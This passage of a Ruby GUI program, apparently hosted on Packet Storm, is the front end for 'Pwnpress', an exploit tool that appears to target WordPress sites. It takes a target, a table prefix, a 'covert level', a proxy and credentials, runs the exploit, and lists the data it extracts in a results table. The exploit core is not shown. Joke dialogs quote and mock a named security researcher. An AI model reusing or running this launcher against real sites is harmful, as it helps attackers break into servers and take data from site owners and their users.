FRAME_SUNKEN|FRAME_THICK|LAYOUT_FILL_ROW)
# Now the results widgets
results = FXGroupBox.new(flayout, "Results", LAYOUT_FILL_X|LAYOUT_FILL_Y|GROUPBOX_TITLE_CENTER|FRAME_RIDGE)
@result_table = FXTable.new(results, :opts => TABLE_COL_SIZABLE|TABLE_ROW_SIZABLE|LAYOUT_FILL_X|LAYOUT_FILL_Y, :padding => 2)
@result_table.visibleRows = 11
@result_table.visibleColumns = 3
end
def evroni_fortune()
title = "WARNING: Original Evronian Fortune - Gadi Evron says..."
micon = FXGIFIcon.new(@pwnApp, THE_REAL_HERO)
evroni_quote = EVRONIAN_QUOTES[rand(EVRONIAN_QUOTES.size)]
ret = FXMessageBox.new(@pwnApp, title, evroni_quote, micon, MBOX_YES_NO).execute
return ret
end
# Serialize the options and launch the Pwnpress instance
def launchPwn(s, p, c)
real_options = {}
real_options[:version] = @options[:version].value
real_options[:fingerprint] = @options[:fingerprint]
real_options[:table_prefix] = @options[:table_prefix]
real_options[:covert_level] = @options[:covert_level]
if @options[:proxy_port].value != 0 and @options[:proxy_host] != ""
real_options[:proxy_host] = @options[:proxy_host].value
real_options[:proxy_port] = @options[:proxy_port].value
else
real_options[:proxy_host] = nil
real_options[:proxy_port] = nil
end
if @options[:username].value != "" and @options[:password].value != ""
real_options[:username] = @options[:username].value
real_options[:password] = @options[:password].value
else
real_options[:username] = nil
real_options[:password] = nil
end
real_options[:target] = @options[:target].value
begin
pwnInstance = Pwnpress.new(real_options)
pwnInstance.exploit
if pwnInstance.results
refreshResultTable(pwnInstance.results)
else
FXMessageBox.new(@pwnApp, "Hmm, no results after exploitation",
"Something didn't work or target is not vulnerable :(",
FXGIFIcon.new(@pwnApp, THE_REAL_HERO), MBOX_OK).execute
end
rescue => e
FXMessageBox.new(@pwnApp, "Ooops: danger rabbi robinson!", e.message,
FXGIFIcon.new(@pwnApp, THE_REAL_HERO), MBOX_OK).execute
puts "............. EXCEPTION"
puts e.message
puts e.backtrace
puts "......................."
end
end
# Refresh the FXTable containing the results after exploitation.
def refreshResultTable(results)
# calculate total size of results hash
rows_size = 0
cols_size = 4 # id + data type + name + data
cols_headers = [ "TYPE", "NAME", "KEY", "VALUE" ]
results.each do |r|
r[1][:data].each do |n|
n[1].each do |i|
rows_size += 1
end
end
end
@result_table.setTableSize(rows_size, cols_size)
row_num = 0
results.each do |r|
row_id = r[0].to_s
row_type = r[1][:data_type].to_s
# output to FXTable widget, yummy (a textbox was too simple :( )
r[1][:data].each do |n|
n[1].each do |i|
row_name = i[0].to_s.stripfmt
row_value = i[1].to_s.stripfmt
row_key = n[0].to_s
cell_type = cols_headers.index("TYPE")
cell_name = cols_headers.index("NAME")
cell_key = cols_headers.index("KEY")
cell_value = cols_headers.index("VALUE")
@result_table.setItemText(row_num, cell_type, row_type)
@result_table.setItemText(row_num, cell_name, row_name)
@result_table.setItemText(row_num, cell_key, row_key)
@result_table.setItemText(row_num, cell_value,row_value)
@result_table.setRowText(row_num, row_id)
if row_num != rows_size-1
row_num += 1
end
end
end
end
cols_headers.each do |h|
@result_table.setColumnText(cols_headers.index(h), h)
end
@result_table.setCellColor(0, 0, FXRGB(255, 255, 255))
@result_table.setCellColor(0, 1, FXRGB(255, 240, 240))
end
# every decently funny exploit should feature a good soundtrack:
# THE FINAL COUNTDOWN by Europe (thanks to j. h. christ for the suggestion)
def play_soundtrack
unless RUBY_PLATFORM =~ /linux/
FXMessageBox.warning(@pwnApp, MBOX_OK, "Music not available :(",
"Only Lunix is supported for pwnage soundtrack, sorry.")
return
end
unless File.exist?("europe-the_final_countdown.mp3")
FXMessageBox.warning(@pwnApp, MBOX_OK, "Music not available :(",
"Please put The Final Countdown (by Europe) as:\n"+
" europe-the_final_countdown.mp3 - in the same " +
"directory of pwnpress-gui, enjoy.\n You will " +
"need some mp3 supported player too.")
return
end
play_path = `which mpg123`.chomp
unless File.exist?(play_path)
play_path = `which mplayer`.chomp
end
unless File.exist?(play_path)
FXMessageBox.warning(@pwnApp, MBOX_OK, "No supported mp3 player",
"Please install either mpg123 or mplayer in PATH.")
return
end
# It's THE FINAL COUNTDOWN! BLOGGERS FALLIN THEY R HATIN ME FLOATIN...
@sound_pid = fork do
exec "#{play_path} europe-the_final_countdown.mp3"
end
end
end
pwnGUI = PwnFoxGui.new()
pwnGUI.activate
if pwnGUI.sound_pid
exec "kill -9 #{pwnGUI.sound_pid}"
end
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed